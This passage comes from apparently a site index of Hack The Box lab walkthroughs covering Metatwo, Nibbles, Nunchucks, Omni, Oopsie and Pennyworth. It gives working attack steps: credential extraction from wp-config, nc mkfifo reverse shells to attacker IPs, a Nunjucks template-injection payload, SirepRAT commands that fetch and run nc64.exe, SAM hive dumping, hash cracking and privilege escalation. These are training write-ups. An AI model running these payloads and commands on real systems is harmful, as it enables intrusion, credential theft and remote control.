6RvFsfZD8XQQpgC4PF/gAqOHNFgHOo6AY0rfsjYAHy9mTiuqqqC3DXq4qsvQIJIcO6D4XcUfBpILo5CVm2YegmCnGm0/UKDO3PB2UtuA8NfW/xboPNk9l28aeVAIK3dMVG7txBkmv37kQ8SlA24Rjp5urTfh0/vgAe8AksuA82SzcIpuRI53zfTk/+Ojzl3c4VYNl8ucWyAAfYzuI2X+w0RBawjSPCuTN3tu7lGJZiC1AAoryfMiac2U5CrO6a2Y7AhV0YQWdYudPJwp0x76r/Nw== - No such file or directory
```

With this, prepare the PHP file code-wpconfig.php to decode and extract the content. The content of code-wpconfig.php would be:

```php
<?php echo zlib_decode(base64_decode('jVVZU/JKEH2+VvkfhhKMoARUQBARAoRNIEDCpgUhIRMSzEYyYVP87TdBBD71LvAANdNzTs/p6dMPaUMyTk9CgQBgJAg0ToVAFwFy/gsc4njOgkDUTdDVTaFhQssCgdDpiQBFWYMXAMtn2TpRI7ErgPGKPsGAP3l68glXW9HN6gHEtqC5Rf9+vk2Trf9x3uAsa+Ek8eN8g6DpLtXKuxix2ygxyzDCzMwteoX28088SbfQr2mUKJpxIRR9zClu1PHZ/FcWOYkzLYgA0t0LAVkDYxNySNYmh0ydHwVa+A+GXIlo0eSWxEZiXOUjxxSu+gcaXVE45ECtDIiDvK5hCIwlTps4S5JsAVl0qQXd5tEvPFS1SjDbmnwR7LcLNFsjmRK1VUtEBlzu7nmIYBr7kqgQcYZbdFxC/C9xrvRuXKLep1lZzhRWVdaI1m7q88ov0V8KO7T4fyFnCXr/qEK/7NN01dkWOcURa6/hWeby9AQEAGE7z1dD8tgpjK6BtibPbAie4MoCnCYAmlOQhW8jM5asjSG4wWN42F04VpJoMyX2iew7PF8fLO159tpFKkDElhQZXV4ZC9iIyIF1Uh2948/3vYy/2WoWeq+51kq524zMXqeYugXa4+WtmsazoftvN6HJXLtFssdM2NIre/18eMBfj20jGbkb9Ts2F6qUZr5AvE3EJoMwv9DJ7n3imnxOSAOzq3RmvnIzFjPEt9SA832jqFLFIplny/XDVbDKpbrMcY3I+mGCxxpDNFrL80dB2JCk7IvEfRWtNRve1KYFWUba2bl2WerNB+/v5GXhI/c2e+qtvlHUqXqO/FMpjFZh3vR6qfBUTg4Tg8Doo1iHHqOXyc+7fERNkEIqL1zgZnD2NlxfFNL+O3VZb08S8RhqUndU9BvFViGaqDJHFC9JJjsZh65qZ34hKr6UAmgSDcsik36e49HuMjVSMnNvcF4KPHzchwfWRng4ryXxq2V4/dF6vPXk/6UWOybscdQhrJinmIhGhYqV9lKRtTrCm0lOnXaHdsV8Za+DQvmCnrYooftCn3/oqlwaTju59E2wnC7j/1iL/VWwyItID289KV+6VNaNmvE66fP6Kh6cKkN5UFts+kD4qKfOhxWrPKr5CxWmQnbKflA/q1OyUBZTv9biD6Uw3Gqf55qZckuRAJWMcpbSvyzM4s2uBOn6Uoh14Nlm4cnOrqRNJzF9ol+ZojX39SPR60K8muKrRy61bZrDKNj7FeNaHnAaWpSX+K6RvFsfZD8XQQpgC4PF/gAqOHNFgHOo6AY0rfsjYAHy9mTiuqqqC3DXq4qsvQIJIcO6D4XcUfBpILo5CVm2YegmCnGm0/UKDO3PB2UtuA8NfW/xboPNk9l28aeVAIK3dMVG7txBkmv37kQ8SlA24Rjp5urTfh0/vgAe8AksuA82SzcIpuRI53zfTk/+Ojzl3c4VYNl8ucWyAAfYzuI2X+w0RBawjSPCuTN3tu7lGJZiC1AAoryfMiac2U5CrO6a2Y7AhV0YQWdYudPJwp0x76r/Nw==')); ?>
```

                        Run:

```bash
php code-wpconfig.php
```

The result is the content of the wp-config.php file of the WordPress installation:

```php
<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'blog' );

/** MySQL database username */
define( 'DB_USER', 'blog' );

/** MySQL database password */
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

/**#@+
 * Authentication Unique Keys and Salts.
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );
define( 'SECURE_AUTH_KEY',  'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
define( 'LOGGED_IN_KEY',    'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
define( 'NONCE_KEY',        'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
define( 'AUTH_SALT',        '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );
define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
define( 'LOGGED_IN_SALT',   '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
define( 'NONCE_SALT',       '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );

/**
 * WordPress Database Table prefix.
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
```

Some lines differ from the stock wp-config.php of a WordPress installation: they provide credentials to access an FTP server:

```php
define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );
```

So... let's connect to the FTP server:

```bash
ftp 10.10.11.186

# After this we will be asked for our username and password.
# Enter username: metapress.htb
# Enter password: 9NYS_ii@FyL_p5M2NvJ
```

We can access two folders on the FTP server: blog and mailer. After browsing and inspecting the files, there is one that catches my attention: /mailer/send_email.php. To get the file, run from the FTP command line:

```
mget send_email.php
```
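If mget stalls on confirmations or mangles the file, the usual ftp-client toggles help (standard ftp commands, shown as a sketch):

```
ftp> binary     # transfer in binary mode so the file is not altered
ftp> prompt     # turn off the per-file confirmation that mget asks for
ftp> mget send_email.php
```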

                        From our attacking machine we can see the content of that file:

```bash
cat send_email.php
```

                        Results:

```php
<?php
/*
 * This script will be used to send an email to all our users when ready for launch
*/

use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;

require 'PHPMailer/src/Exception.php';
require 'PHPMailer/src/PHPMailer.php';
require 'PHPMailer/src/SMTP.php';

$mail = new PHPMailer(true);

$mail->SMTPDebug = 3;
$mail->isSMTP();

$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
$mail->SMTPSecure = "tls";
$mail->Port = 587;

$mail->From = "jnelson@metapress.htb";
$mail->FromName = "James Nelson";

$mail->addAddress("info@metapress.htb");

$mail->isHTML(true);

$mail->Subject = "Startup";
$mail->Body = "<i>We just started our new blog metapress.htb!</i>";

try {
    $mail->send();
    echo "Message has been sent successfully";
} catch (Exception $e) {
    echo "Mailer Error: " . $mail->ErrorInfo;
}
```

This script contains credentials for the user jnelson, whom we had already spotted in the /etc/passwd file; now we also have his password.

From the initial enumeration of ports and services on the Metatwo machine, we know that the SSH service is running. We try to log in:

```bash
# Quick install of sshpass if you prefer to make the ssh connection in one line
sudo apt install sshpass
sshpass -p 'Cb4_JmWM8zUZWMu@Ys' ssh jnelson@10.10.11.186
```

Now you are in jnelson's terminal. To get the user's flag, run:

```bash
cat user.txt
```
                        ","tags":["walkthrough"]},{"location":"htb-metatwo/#getting-the-systems-flag","title":"Getting the System's flag","text":"

                        Coming soon.

                        ","tags":["walkthrough"]},{"location":"htb-metatwo/#some-other-write-ups-and-learning-material-related","title":"Some other write-ups and learning material related","text":"
                        • https://tryhackme.com/room/wordpresscve202129447
                        • Wpscan: CVE-2021-29447
                        • https://www.maketecheasier.com/pgp-encryption-how-it-works/
                        ","tags":["walkthrough"]},{"location":"htb-mongod/","title":"Walkthrough - A HackTheBox machine - Mongod","text":"

                        Enumerate open services/ports:

```bash
nmap -sC -sV $ip -Pn -p-
```

                        Ports 22 and 27017 are open.

```bash
mongo IP:port
# in my case: mongo 10.129.228.30:27017
```

Now, use a MongoDB cheat sheet to browse the databases:

```
show databases
use sensitive_information
show collections
db.flag.find()
```
                        ","tags":["walkthrough","mongodb","port 27017"]},{"location":"htb-nibbles/","title":"Nibbles - A HackTheBox machine","text":"


```bash
nmap -sC -sV -Pn 10.129.96.84
```

                        Results:

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4f8ade8f80477decf150d630a187e49 (RSA)
|   256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_  256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Visiting the IP on port 80 in the browser and reviewing the source code, there is a comment:

```
<!-- /nibbleblog/ directory. Nothing interesting here! -->
```

                        So, we have a website at http://10.129.96.84/nibbleblog/

                        Dirb enumeration reveals a login panel: http://10.129.96.84/nibbleblog/admin.php

```bash
dirb http://10.129.96.84/nibbleblog/ /usr/share/wordlists/dirb/common.txt
```

Too many login attempts too quickly trigger a lockout with the message "Nibbleblog security error - Blacklist protection".

Also, dirb enumeration reveals some directories with listing enabled. Browsing around we get to this file: http://10.129.96.84/nibbleblog/content/private/users.xml, where the user "admin" is exposed.

Also, the CMS version is disclosed in http://10.129.96.84/nibbleblog/README:

```
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
```
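A quick way to run that kind of search locally is searchsploit (a generic step, not necessarily how the link below was found; output omitted):

```bash
# Query the local Exploit-DB mirror for known Nibbleblog exploits
searchsploit nibbleblog
```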

                        A quick search for that version brings up this vulnerability:

                        https://github.com/dix0nym/CVE-2015-6967/blob/main/README.md

                        In the usage example we can read:

```bash
python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php
```

                        Default credentials are:

```
admin:nibbles
```

                        Also, reading the code of the exploit, we can see that the triggered endpoint for this CVE-2015-6967 is:

```python
uploadURL = f"{nibbleURL}admin.php?controller=plugins&action=config&plugin=my_image"
```

Knowing this, we can log in to the panel at http://10.129.96.84/nibbleblog/admin.php and go to Plugins > My Image > Configure.

In the browser, upload a file. In my case, I uploaded my pentestmonkey PHP reverse shell.

                        Now, we need to find where this file has been saved to. After browsing around, I ended up in http://10.129.96.84/nibbleblog/content/private/plugins/my_image/

There we find a file called image.php. Before clicking on it, we open a netcat listener on our attacker machine:

```bash
nc -lnvp 1234
```

                        Click on the file image.php listed in http://10.129.96.84/nibbleblog/content/private/plugins/my_image/ and you will have a reverse shell.

                        Cat user.txt (under /home/nibbler).

                        ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nibbles/#privilege-escalation","title":"Privilege escalation","text":"
                        sudo -l\n

                        Results:

```
$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```

At /home/nibbler, unzip the file personal.zip. Now you can even replace monitor.sh with a different monitor.sh. Mine contains:

```bash
/bin/bash
```
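One way to perform the replacement from the shell (a minimal sketch that overwrites the script sudo is allowed to run):

```bash
cd /home/nibbler/personal/stuff
echo '/bin/bash' > monitor.sh   # the script now just spawns a shell
chmod +x monitor.sh
```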

                        Now run:

```bash
sudo -u root /home/nibbler/personal/stuff/monitor.sh
```

                        And you are root. Remember to do a chmod if needed.

                        ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nibbles/#some-input-from-htb-walkthrough","title":"Some input from HTB walkthrough","text":"

You can run an nmap script scan against the discovered ports:

```bash
nmap -sC -p 22,80 -oA nibbles_script_scan 10.129.42.190
```

                        For privilege escalation:

```bash
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh
```

                        Alternative way:

```
msf6 > search nibbleblog

msf6 > use exploit/multi/http/nibbleblog_file_upload

msf6 exploit(multi/http/nibbleblog_file_upload) > set rhosts 10.129.42.190
rhosts => 10.129.42.190
msf6 exploit(multi/http/nibbleblog_file_upload) > set lhost 10.10.14.2
lhost => 10.10.14.2
```

                        We need to set the admin username and password admin:nibbles and the TARGETURI to nibbleblog.

                        ","tags":["walkthrough","reverse shell","CVE-2015-6967"]},{"location":"htb-nunchucks/","title":"Nunchucks - A Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#users-flag","title":"User's flag","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#enumeration","title":"Enumeration","text":"
                        nmap -sC -sV 10.129.95.252 -Pn\n

                        Open ports: 22, 80, and 443.

The results also point to http://nunchucks.htb.

                        Adding IP and domain nunchucks.htb to /etc/hosts.

```bash
whatweb http://nunchucks.htb
```

                        And some directory enumeration:

```bash
feroxbuster -u https://nunchucks.htb -k
```

                        Results:

```
200      GET      250l     1863w    19134c https://nunchucks.htb/Privacy
200      GET      245l     1737w    17753c https://nunchucks.htb/Terms
200      GET      183l      662w     9172c https://nunchucks.htb/login
200      GET      187l      683w     9488c https://nunchucks.htb/signup
```

                        Trying to login into the application or signing up returns the following response message:

                        {\"response\":\"We're sorry but user logins are currently disabled.\"}\n\n{\"response\":\"We're sorry but registration is currently closed.\"}\n

Now, we will try some subdomain enumeration:

```bash
wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H "Host: FUZZ.nunchucks.htb" --hl 546
# -c: Color in output
# --hc 404: Hide 404 code responses
# -t 200: Concurrent threads
# -u https://nunchucks.htb/: Target URL
# -w /usr/share/dirb/wordlists/common.txt: Wordlist
# -H "Host: FUZZ.nunchucks.htb": Header; FUZZ marks the injection point for payloads
# --hl 546: Filter out responses with a specific number of lines (546 here)
```

                        Results: store

                        We will add store.nunchucks.htb to /etc/hosts file.

                        ","tags":["walkthrough"]},{"location":"htb-nunchucks/#exploitation","title":"Exploitation","text":"

Browsing https://store.nunchucks.htb we find a simple landing page that collects emails through a form. After fuzzing that form with Burp Suite we find this interesting output:

Some code gets executed in the field. This vulnerability is known as Server-Side Template Injection (SSTI).

Once we have an injection endpoint, it's important to identify the application server and the template engine running on it, since payloads and exploitation pretty much depend on them.
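A quick way to fingerprint the engine family is to submit small arithmetic probes and watch which ones get evaluated (a common heuristic, not specific to this box):

```
{{7*7}}   ->  if the page renders 49, a Jinja2/Twig/Nunjucks-style engine evaluated it
${7*7}    ->  targets other families (e.g. FreeMarker); staying literal helps narrow things down
```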

From the response headers we have: "X-Powered-By: Express".

Having a look at the template engines available for Express at https://expressjs.com/en/resources/template-engines.html, there is Nunjucks, whose name is suspiciously close to the domain name nunchucks.

This blog post describes how we can exploit this vulnerability: http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine

                        Basically, I'm using the following payloads:

```
{{range}}

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}}

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f')\")()}}
```

The last one is a reverse shell. Before running it in Burp Suite's Repeater, I've set up my netcat listener on port 1234.

                        ","tags":["walkthrough"]},{"location":"htb-nunchucks/#roots-flag","title":"Root's flag","text":"","tags":["walkthrough"]},{"location":"htb-nunchucks/#privileges-escalation","title":"Privileges escalation","text":"

We'll abuse misconfigured binary capabilities to escalate to root. First we list file capabilities recursively (note the search root / as argument):

```bash
getcap -r / 2>/dev/null
```

                        Result:

```
/usr/bin/perl = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
```

We will use the perl binary, which carries cap_setuid+ep, to escalate.

```bash
echo -ne '#!/bin/perl \nuse POSIX qw(setuid); \nPOSIX::setuid(0); \nexec "/bin/bash";' > pay.pl
chmod +x pay.pl
./pay.pl
```

                        And you are root.

                        ","tags":["walkthrough"]},{"location":"htb-omni/","title":"Walkthrough - Omni, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-omni/#about-the-machine","title":"About the machine","text":"data Machine Omni Platform Hackthebox url link OS Windows Difficulty Easy Points 20 ip 10.129.2.27","tags":["walkthrough"]},{"location":"htb-omni/#getting-usertxt-flag","title":"Getting user.txt flag","text":"","tags":["walkthrough"]},{"location":"htb-omni/#enumeration","title":"Enumeration","text":"
                        sudo nmap -sV -sC $ip -p-\n

                        Results:

```
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
```
                        ","tags":["walkthrough"]},{"location":"htb-omni/#exploiting-tcp-2981729820","title":"Exploiting TCP 29817/29820","text":"

These ports correspond to the Sirep test service of Windows IoT Core; we can exploit them with SirepRAT. Investigate:

```bash
# Test for an existing file
python ~/tools/SirepRAT/SirepRAT.py $ip GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v

# Place a nc64.exe file in the Apache root
sudo cp ~/tools/nc64.exe /var/www/html

# Start the Apache server
sudo service apache2 start

# Upload nc64.exe: with SirepRAT, use cmd.exe on the victim machine to launch a PowerShell download
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c powershell Invoke-WebRequest -outfile c:\windows\system32\nc64.exe -uri http://10.10.14.2/nc64.exe'

# Open a listener on our attacker machine
rlwrap nc -lnvp 443

# Launch netcat on the victim machine via SirepRAT
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c c:\windows\system32\nc64.exe -e cmd 10.10.14.2 443'
```

                        After browsing around we can see these interesting files:

                        • C:\\Data\\Users\\administrator\\root.txt
                        • C:\\Data\\Users\\app\\user.txt
                        • C:\\Data\\Users\\app\\iot-admin.xml
                          • C:\\Data\\Users\\app\\hardening.txt

user.txt and root.txt are PSCredential files. To decrypt the passwords they store, we will need the app user's password and the administrator's password. There are several approaches to obtain them:

                        ","tags":["walkthrough"]},{"location":"htb-omni/#path-1-creds-in-a-file","title":"Path 1: creds in a file","text":"

Evaluate the files until you get to C:\Program Files\WindowsPowershell\Modules\PackageManagement. Use PowerShell so you can run:

```
ls -force
type r.bat
```

                        Result:

```
@echo off

:LOOP

for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

ping -n 3 127.0.0.1

cls

GOTO :LOOP

:EXIT
```
                        ","tags":["walkthrough"]},{"location":"htb-omni/#path-2-dump-samsystemsecurity-hives-extract-hashes-and-crack-them","title":"Path 2: Dump sam/system/security hives, extract hashes and crack them","text":"

                        We will dump the SAM database to the attacker's machine. For that, first we will create a share in the attacker's machine:

```bash
# First create the share CompData on our attacker's machine
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/username/Documents/ -username "username" -password "agreatpassword"

# After that, map the share from the victim via SirepRAT
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c net use \\10.10.14.2\CompData /u:username agreatpassword'
```

                        After that we can dump the hives: sam, system, and security:

```bash
# Now we will dump the hives we need. First, the SAM database
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c reg save HKLM\sam \\10.10.14.2\CompData\sam'

# Secondly, system
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c reg save HKLM\system \\10.10.14.2\CompData\system'

# Thirdly, security
python ~/tools/SirepRAT/SirepRAT.py $ip LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c reg save HKLM\security \\10.10.14.2\CompData\security'
```

Now, from the attacker's machine, we can use secretsdump.py to extract the hashes:

```bash
secretsdump.py -sam sam -security security -system system LOCAL
```

                        From that we will obtain the following NTLM hashes:

```
Impacket v0.10.1.dev1+20230511.163246.f3d0b9e - Copyright 2022 Fortra

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
```
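The hashcat command below expects one NT hash per line in hashes.txt. Assuming the secretsdump output was saved to dump.txt (hypothetical filename), the file can be built like this:

```bash
# Keep only the account lines and extract the NT hash (4th colon-separated field)
grep ':::' dump.txt | cut -d: -f4 > hashes.txt
```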

                        We can crack them with hashcat:

```bash
hashcat -m 1000 -O -a3 -i hashes.txt
```
                        ","tags":["walkthrough"]},{"location":"htb-omni/#exploiting-tcp-8080","title":"Exploiting TCP 8080","text":"

The credentials obtained for the users app and administrator are valid to log in to the portal we observed earlier on port 8080.

Log in as app and go to the option "Run Command".

                        From the attacker's machine, get a terminal listening:

```bash
rlwrap nc -lnvp 443
```

                        In the Run command screen, run:

                        c:\\windows\\system32\\nc64.exe -e cmd 10.10.14.2 443\n

                        The listener will display the connection. Now:

```
# Launch powershell
powershell

# Go to the app user's folder
cd C:\Data\Users\app

# Decrypt the PSCredential file
(Import-CliXml -Path user.txt).GetNetworkCredential().Password

As a result you will obtain the user.txt flag.

                        ","tags":["walkthrough"]},{"location":"htb-omni/#get-roottxt","title":"Get root.txt","text":"

Log out of the portal as user app and log in again as administrator.

                        From the attacker's machine, get a terminal listening:

```bash
rlwrap nc -lnvp 443
```

                        In the Run command screen, run:

                        c:\\windows\\system32\\nc64.exe -e cmd 10.10.14.2 443\n

                        The listener will display the connection. Now:

```
# Launch powershell
powershell

# Go to the administrator's folder
cd C:\Data\Users\administrator

# Decrypt the PSCredential file
(Import-CliXml -Path root.txt).GetNetworkCredential().Password
```

As a result you will obtain the root.txt flag.

                        ","tags":["walkthrough"]},{"location":"htb-oopsie/","title":"Oopsie - A Hack The Box machine","text":"
                        nmap -sC -sV $ip -Pn\n
                        Host is up (0.034s latency).\nNot shown: 998 closed tcp ports (conn-refused)\nPORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 61e43fd41ee2b2f10d3ced36283667c7 (RSA)\n|   256 241da417d4e32a9c905c30588f60778d (ECDSA)\n|_  256 78030eb4a1afe5c2f98d29053e29c9f2 (ED25519)\n80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-title: Welcome\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

Open the browser. From the scripts loaded by the home page you can extract this path:

```
<script src="/cdn-cgi/login/script.js"></script>
```

Then you land on a login page that provides a way to log in as a guest.

Once logged in as a guest, pay attention to the cookies:

Now, in the browser, change id=2 to id=1 to see if data from another user is exposed.

                        It is. Change the value of the cookies in the browser to be admin.

Upload a PHP reverse shell. I usually use the pentestmonkey one.

Now I use gobuster to enumerate possible locations for the upload:

```bash
gobuster dir -u http://10.129.95.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 20
```

```
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.95.191
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://10.129.95.191/images/]
/themes               (Status: 301) [Size: 315] [--> http://10.129.95.191/themes/]
/uploads              (Status: 301) [Size: 316] [--> http://10.129.95.191/uploads/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.95.191/css/]
/js                   (Status: 301) [Size: 311] [--> http://10.129.95.191/js/]
/fonts                (Status: 301) [Size: 314] [--> http://10.129.95.191/fonts/]
Progress: 87567 / 87665 (99.89%)
===============================================================
===============================================================
```

Nice, but as the admin user I cannot get into http://10.129.95.191/uploads/.

Is there any other user with more permissions? I will use Burp Suite Intruder to enumerate possible users by iterating the id parameter (an insecure direct object reference). This would be the endpoint: http://10.129.95.191/cdn-cgi/login/admin.php?content=accounts&id=30
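Outside Burp, a rough equivalent of that Intruder run is a simple loop over the id parameter; the session cookie and the grep filter here are placeholders you would adapt:

```bash
# Hypothetical IDOR sweep; set COOKIE to your authenticated session cookie first
for i in $(seq 1 50); do
  echo "--- id=$i ---"
  curl -s -b "$COOKIE" "http://10.129.95.191/cdn-cgi/login/admin.php?content=accounts&id=$i" | grep -iE 'name|access'
done
```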

                        User id 30 is super admin. With this I update my cookies and now I'm able to access http://10.129.95.191/uploads/pentesmonkey.php. Before that:

```bash
nc -lnvp 1234
```
                        ","tags":["walkthrough"]},{"location":"htb-pennyworth/","title":"Pennyworth - A HackTheBox machine","text":"
                        nmap -sC -sV $ip -Pn -p-\n

Port 8080 is open and from the browser we can see the login page of a Jenkins service. The version is not displayed.

Run this request through Burp Suite Intruder:

```
POST /j_spring_security_check HTTP/1.1
Host: 10.129.228.92:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://10.129.228.92:8080
Connection: close
Referer: http://10.129.228.92:8080/login?from=%2F
Cookie: JSESSIONID.4f24ed31=node0de80ew54idnc17ajfpe13p5hc0.node0
Upgrade-Insecure-Requests: 1

j_username=admin&j_password=!@#$%^&from=%2F&Submit=Sign+in
```

The payload position is the password parameter. You can use several dictionaries. For the sampled request, the response is a 500 response code with the Jenkins version visible in the footer:

```
<div class="page-footer__links page-footer__links--white jenkins_ver"><a rel="noopener noreferrer" href="https://jenkins.io/" target="_blank">Jenkins 2.289.1</a></div>
```

The default credentials for the service (admin:password) don't work, but brute forcing with basic dictionaries yields root:password.

There is a nice repository for pentesting Jenkins. There might be several approaches and solutions to this machine; in my case, I used the Script Console provided by Jenkins with the following payload:

```java
String host="myip";
int port=1234;
